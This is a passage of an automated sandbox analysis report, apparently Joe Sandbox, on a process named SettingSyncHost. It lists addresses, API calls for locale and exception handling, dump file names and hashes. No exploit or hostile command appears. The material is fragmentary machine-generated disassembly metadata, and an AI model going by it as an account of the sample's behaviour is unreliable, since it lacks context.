                                                                                                                                      0x0039d105
                                                                                                                                      0x0039d109
                                                                                                                                      0x0039d10c
                                                                                                                                      0x0039d10c
                                                                                                                                      0x0039d112
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d112
                                                                                                                                      0x0039d0e6
                                                                                                                                      0x0039d0ea
                                                                                                                                      0x0039d0ed
                                                                                                                                      0x0039d0ed
                                                                                                                                      0x0039d0f3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d4a5
                                                                                                                                      0x0039d4ab
                                                                                                                                      0x0039d522
                                                                                                                                      0x0039d524
                                                                                                                                      0x0039d526
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d526
                                                                                                                                      0x0039d4ad
                                                                                                                                      0x0039d4b0
                                                                                                                                      0x0039d4b4
                                                                                                                                      0x0039d4b6
                                                                                                                                      0x0039d4cb
                                                                                                                                      0x0039d4cb
                                                                                                                                      0x0039d4cf
                                                                                                                                      0x0039d4d3
                                                                                                                                      0x0039d4d5
                                                                                                                                      0x0039d4ea
                                                                                                                                      0x0039d4ea
                                                                                                                                      0x0039d4ee
                                                                                                                                      0x0039d4f2
                                                                                                                                      0x0039d4f4
                                                                                                                                      0x0039d509
                                                                                                                                      0x0039d509
                                                                                                                                      0x0039d50d
                                                                                                                                      0x0039d511
                                                                                                                                      0x0039d513
                                                                                                                                      0x0039d515
                                                                                                                                      0x0039d51c
                                                                                                                                      0x0039d51c
                                                                                                                                      0x0039d51c
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d513
                                                                                                                                      0x0039d4f6
                                                                                                                                      0x0039d4fa
                                                                                                                                      0x0039d4fd
                                                                                                                                      0x0039d4fd
                                                                                                                                      0x0039d503
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d503
                                                                                                                                      0x0039d4d7
                                                                                                                                      0x0039d4db
                                                                                                                                      0x0039d4de
                                                                                                                                      0x0039d4de
                                                                                                                                      0x0039d4e4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d4e4
                                                                                                                                      0x0039d4b8
                                                                                                                                      0x0039d4bc
                                                                                                                                      0x0039d4bf
                                                                                                                                      0x0039d4bf
                                                                                                                                      0x0039d4c5
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d88d
                                                                                                                                      0x0039d893
                                                                                                                                      0x0039d90b
                                                                                                                                      0x0039d90d
                                                                                                                                      0x0039d90f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d90f
                                                                                                                                      0x0039d895
                                                                                                                                      0x0039d899
                                                                                                                                      0x0039d89d
                                                                                                                                      0x0039d89f
                                                                                                                                      0x0039d8b4
                                                                                                                                      0x0039d8b4
                                                                                                                                      0x0039d8b8
                                                                                                                                      0x0039d8bc
                                                                                                                                      0x0039d8be
                                                                                                                                      0x0039d8d3
                                                                                                                                      0x0039d8d3
                                                                                                                                      0x0039d8d7
                                                                                                                                      0x0039d8db
                                                                                                                                      0x0039d8dd
                                                                                                                                      0x0039d8f2
                                                                                                                                      0x0039d8f2
                                                                                                                                      0x0039d8f6
                                                                                                                                      0x0039d8fa
                                                                                                                                      0x0039d8fc
                                                                                                                                      0x0039d8fe
                                                                                                                                      0x0039d905
                                                                                                                                      0x0039d905
                                                                                                                                      0x0039d905
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d8fc
                                                                                                                                      0x0039d8df
                                                                                                                                      0x0039d8e3
                                                                                                                                      0x0039d8e6
                                                                                                                                      0x0039d8e6
                                                                                                                                      0x0039d8ec
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d8ec
                                                                                                                                      0x0039d8c0
                                                                                                                                      0x0039d8c4
                                                                                                                                      0x0039d8c7
                                                                                                                                      0x0039d8c7
                                                                                                                                      0x0039d8cd
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d8cd
                                                                                                                                      0x0039d8a1
                                                                                                                                      0x0039d8a5
                                                                                                                                      0x0039d8a8
                                                                                                                                      0x0039d8a8
                                                                                                                                      0x0039d8ae
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd27

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: /F9
                                                                                                                                      • API String ID: 0-896972868
                                                                                                                                      • Opcode ID: 727c47f388e5ec40e6bb42996d143e3ee289c64d3bb252a72f2b9da7194b2ef5
                                                                                                                                      • Instruction ID: 393c3647aa30161b08e1e087e7476cee768ab353d1e8e8bee1a7dbdb87d73255
                                                                                                                                      • Opcode Fuzzy Hash: 727c47f388e5ec40e6bb42996d143e3ee289c64d3bb252a72f2b9da7194b2ef5
                                                                                                                                      • Instruction Fuzzy Hash: 1102A233D696B24B8F734EB944D02277FA06E01B9131F96E9DDC43F59AC212ED0696E0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D9776, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003D978C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                      • Opcode ID: 1d3673e8e3ce46aa024418da8d3dcda6ab5a3868b0d79bdf5ccbfbcee5615879
                                                                                                                                      • Instruction ID: 9c9c2a72d5b83e168778c91f246a31953d7ca53bdfcd0386e47b0b6b87805cc5
                                                                                                                                      • Opcode Fuzzy Hash: 1d3673e8e3ce46aa024418da8d3dcda6ab5a3868b0d79bdf5ccbfbcee5615879
                                                                                                                                      • Instruction Fuzzy Hash: 5851ACB2A01605CBDB1ACF64EA913AEBBF4FB88310F25842BD405EB360D3749E40CB54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EA7D5, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c50e80c7b6320d654c8f95c91de14614c7df028d2240debc6172520114fc2e0e
                                                                                                                                      • Instruction ID: 9a8a922522e605d0b8f312a8823efd658156e1b283faeb85985fee85540c3842
                                                                                                                                      • Opcode Fuzzy Hash: c50e80c7b6320d654c8f95c91de14614c7df028d2240debc6172520114fc2e0e
                                                                                                                                      • Instruction Fuzzy Hash: 0041C5B580466CAFDB11DF69CC89AAABBB8EF45300F1442DDE45DD7241DA309E81CF10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EE373, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5A72
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5AA8
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003EE3C7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast_free$InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2003897158-0
                                                                                                                                      • Opcode ID: 262b81d336c56c40dfed72b0fe639f2875b2d05439569dd4d4ea242443f77f28
                                                                                                                                      • Instruction ID: 26d8b7aad45fa5032dfa1e2b35467a6fa5c43f7541830f3c5397ea788dc2cbad
                                                                                                                                      • Opcode Fuzzy Hash: 262b81d336c56c40dfed72b0fe639f2875b2d05439569dd4d4ea242443f77f28
                                                                                                                                      • Instruction Fuzzy Hash: AB219572611266ABDB2AAB57DC41EBA73ACEF48314F10427AF901DA1C1EB74ED40CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EE59F, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,003EE33C,00000000,00000000,?), ref: 003EE5CB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                      • Opcode ID: fe282ec0bb216f72e9ed4fb3f08a8f4e0f44cfaa40d1f2532987b95fcad34d0a
                                                                                                                                      • Instruction ID: cd37fa1cb01d1c8ea581effbb5b49533a8fccd88eed05948d0968c82e12d1490
                                                                                                                                      • Opcode Fuzzy Hash: fe282ec0bb216f72e9ed4fb3f08a8f4e0f44cfaa40d1f2532987b95fcad34d0a
                                                                                                                                      • Instruction Fuzzy Hash: B0F0A9326001716BDB3A5B26C84ABBB7768EB40759F154525ED06A71C0EB74FD41C690
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EE095, Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(003EE373,00000001,00000000,?,-00000050,?,003EE712,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 003EE0DF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                      • Opcode ID: ea202b1270e6d048acb658dc6c5e0d1674b8c5a81d34669d61f684a075264718
                                                                                                                                      • Instruction ID: 37beea2eb8c2000541776e0c6dc38418e360c3fb889227932a5528d3f12744fe
                                                                                                                                      • Opcode Fuzzy Hash: ea202b1270e6d048acb658dc6c5e0d1674b8c5a81d34669d61f684a075264718
                                                                                                                                      • Instruction Fuzzy Hash: FCF046362003545FCB265F3BCC81A7A7B91EF80368F05863CF9064B6D0D6B19C01C740
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E8AF9, Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E3614: EnterCriticalSection.KERNEL32(?,?,003E0CC4,00000000,00407890,0000000C,003E0C8B,?,?,003E5C95,?,?,003E5BB2,00000001,00000364,00000006), ref: 003E3623
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(003E8AEC,00000001,00407B30,0000000C,003E8F17,00000000), ref: 003E8B31
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                      • Opcode ID: 16b52fce1be11df105865fbec2313fd21c72f31d8d740d16533937d64c14a235
                                                                                                                                      • Instruction ID: 1ab41cda7dfff90981fb2710c9e5ab7e28665a9df36dd21b51b12c3348b71cd3
                                                                                                                                      • Opcode Fuzzy Hash: 16b52fce1be11df105865fbec2313fd21c72f31d8d740d16533937d64c14a235
                                                                                                                                      • Instruction Fuzzy Hash: 3FF03772A10354DFDB01EFA9E942B9D7BB0EB08721F10462AE414AB2E0CB756940CB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EDFAF, Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(003EDF08,00000001,00000000,?,?,003EE770,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 003EDFE6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                      • Opcode ID: ab8cfd3b824fd1f8f920e8aea2fe134ff58e4cf88bc29f3408b476af7d96020c
                                                                                                                                      • Instruction ID: f273fe0d2bb96386f5b4c11a82462ffa077e6a71afab25750ed8649bdedcf541
                                                                                                                                      • Opcode Fuzzy Hash: ab8cfd3b824fd1f8f920e8aea2fe134ff58e4cf88bc29f3408b476af7d96020c
                                                                                                                                      • Instruction Fuzzy Hash: 65F0553630029557CB06EF3AD84566A7F94EFC2710B070058FA068F2C0C6719843C790
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E901B, Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,003E3125,?,20001004,00000000,00000002,?,?,003E2732), ref: 003E904F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                      • Opcode ID: f413702d59cc695ef2877a40715ec2e41cc3d6938ab0fa6aefbb8e4c8eb1dc52
                                                                                                                                      • Instruction ID: 122b83bdd2ce87b0edda5913d27bbf9650480d2d3a7c58fb99eabddc1fc73c29
                                                                                                                                      • Opcode Fuzzy Hash: f413702d59cc695ef2877a40715ec2e41cc3d6938ab0fa6aefbb8e4c8eb1dc52
                                                                                                                                      • Instruction Fuzzy Hash: 1EE04F31501168BBCF232F62DC08BAE7F2AEF44760F004112FD09692A1DB318D61AB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039B0C8, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • EnumSystemLocalesA.KERNEL32(Function_0000AD33), ref: 0039B0E1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                      • Opcode ID: 7f75b9c205939496c9c86652d6b2dbc990bab409fb33077eb93dd558a4eb93b2
                                                                                                                                      • Instruction ID: c0b19b1a8b75db4d1d938378b11e132cc2541acad53b8732b1599fed03bfd659
                                                                                                                                      • Opcode Fuzzy Hash: 7f75b9c205939496c9c86652d6b2dbc990bab409fb33077eb93dd558a4eb93b2
                                                                                                                                      • Instruction Fuzzy Hash: A0D0A57090578747DB218F21C548381FFF07F41B19F95C69CC65912543C37AE585CB44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003B024E, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E003B024E() {

				SetUnhandledExceptionFilter(E003B020C);
				return 0;
			}



                                                                                                                                      0x003b0253
                                                                                                                                      0x003b025b

                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0002020C), ref: 003B0253
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      • Opcode ID: 355b4cdd8161d6da2239363025bfc21885ca96783615694a5eb38ed82566fae8
                                                                                                                                      • Instruction ID: 4fc40975f810c6fe4b4d6076f5211278368303a8ba3f1ce5987f0a1c8fcafe5c
